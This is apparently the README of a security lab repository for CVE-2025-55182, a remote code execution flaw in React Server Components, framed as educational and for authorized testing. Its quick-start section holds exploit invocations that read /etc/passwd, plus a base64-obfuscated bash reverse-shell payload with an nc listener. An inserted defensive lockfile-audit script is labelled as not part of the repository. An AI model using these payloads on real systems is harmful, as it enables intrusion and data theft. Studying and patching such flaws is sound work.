alsaut1/react2shell-lab

React2Shell - CVE-2025-55182 Lab

A comprehensive laboratory for demonstrating and testing the critical vulnerability CVE-2025-55182 in React Server Components.

⚠️ Educational Purpose Only

This repository is intended for:

  • Security research and education
  • Understanding vulnerability mechanisms
  • Testing on your own systems
  • Bug bounty hunting preparation

Do not use against systems you don't own or have explicit permission to test. Unauthorized access is illegal.

🔴 Vulnerability Details

  • CVE ID: CVE-2025-55182
  • CVSS Score: 10.0 (Critical)
  • Type: Unauthenticated Remote Code Execution (RCE)
  • Affected Components:
    • React 19.0.0 - 19.2.0
    • Next.js 15.x - 16.x
  • Root Cause: Unsafe deserialization in React Server Components "Flight" protocol

⚡ Capabilities

✅ Execute arbitrary commands without authentication
✅ Read system files
✅ Create and modify files
✅ Establish reverse shell connections
✅ Achieve full server control

🚀 Quick Start

1. Installation

npm install --legacy-peer-deps
npm run dev

The server will start at http://localhost:3000

2. Check Vulnerability

bash check-cve.sh

3. Running Exploits

cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"

4. Reverse Shell

# Terminal 1 - Listener
nc -lvnp 4444

# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"

📁 Project Structure

├── app/              # Vulnerable Next.js application
├── exploit/          # Working PoC exploit
│   └── rce_final.py  # Main exploit script
├── check-cve.sh      # Automated vulnerability checker
├── package.json      # Vulnerable dependencies
└── README.md

🔧 Technical Details

The vulnerability exists in the deserialization logic of React Server Components payloads. The exploit leverages prototype pollution to execute arbitrary code via process.mainModule.require('child_process').execSync().

Attack Flow

  1. Craft malicious multipart form data
  2. Send to vulnerable React application
  3. Exploit unsafe deserialization in "Flight" protocol
  4. Achieve RCE on the server

📊 Impact

  • Confidentiality: HIGH (read any file)
  • Integrity: HIGH (modify/create files)
  • Availability: HIGH (execute denial of service commands)

✅ Mitigation

  1. Update React to 19.2.1 or later
  2. Update Next.js to 15.0.5+ or 16.0.7+
  3. Deploy Web Application Firewall (WAF) rules
  4. Monitor server logs for exploitation attempts
  5. Use runtime protection mechanisms
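As an added defensive example (not part of this repository), the following Python script audits an npm lockfile against the version boundaries this README states in its Affected Components and Mitigation sections; the sample lockfile is constructed, and the script assumes the lockfileVersion 2/3 "packages" layout.

```python
import json
import re

# Version boundaries as this README states them (React 19.0.0-19.2.0
# affected, fixed 19.2.1; Next.js 15.x fixed 15.0.5, 16.x fixed 16.0.7).
# Entries are (first_affected, first_fixed); confirm against the vendor
# advisory before relying on them.
AFFECTED_RANGES = {
    "react": [((19, 0, 0), (19, 2, 1))],
    "next": [((15, 0, 0), (15, 0, 5)), ((16, 0, 0), (16, 0, 7))],
}

def parse_version(spec):
    """(major, minor, patch) for a resolved version like '19.2.0' or
    'v16.0.6'; None for tags/ranges ('latest', '^19.0.0') needing review."""
    m = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", spec.strip())
    return tuple(int(x) for x in m.groups()) if m else None

def is_vulnerable(pkg, version):
    """True inside an affected range, False outside, None if unparseable."""
    v = parse_version(version)
    if v is None:
        return None
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES.get(pkg, []))

def audit_lockfile(lock_json):
    """Report every react/next entry in the 'packages' map of an npm
    lockfile (lockfileVersion 2/3), including nested copies such as
    node_modules/<dep>/node_modules/react, with its verdict."""
    data = json.loads(lock_json)
    findings = []
    for path, meta in data.get("packages", {}).items():
        name = path.rsplit("node_modules/", 1)[-1]  # root entry "" is skipped
        if name in AFFECTED_RANGES:
            version = meta.get("version", "")
            findings.append((path, version, is_vulnerable(name, version)))
    return findings

# Constructed sample lockfile, not taken from this repository.
SAMPLE_LOCK = json.dumps({"lockfileVersion": 3, "packages": {
    "": {"name": "demo", "dependencies": {"react": "^19.0.0"}},
    "node_modules/react": {"version": "19.2.0"},
    "node_modules/next": {"version": "16.0.7"},
    "node_modules/legacy-ui/node_modules/react": {"version": "19.0.0"},
}})

if __name__ == "__main__":
    for path, version, verdict in audit_lockfile(SAMPLE_LOCK):
        print(f"{path}: {version} -> {'VULNERABLE' if verdict else 'review' if verdict is None else 'ok'}")
```

Nested copies matter because a top-level upgrade leaves a vulnerable React pinned by another dependency in place; the audit reports each path separately.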

📚 References

⚖️ Legal Disclaimer

This code is provided for educational and authorized security testing purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. Unauthorized access to computer systems is illegal under laws such as the Computer Fraud and Abuse Act (CFAA) and similar legislation in other jurisdictions.

The author assumes no liability for misuse of this information.

🎓 Learning Outcomes

After working through this lab, you will understand:

  • How unsafe deserialization vulnerabilities work
  • Prototype pollution attack techniques
  • React Server Components architecture
  • RCE exploitation methods
  • Proper vulnerability disclosure practices

About

CVE-2025-55182 React2Shell PoC lab
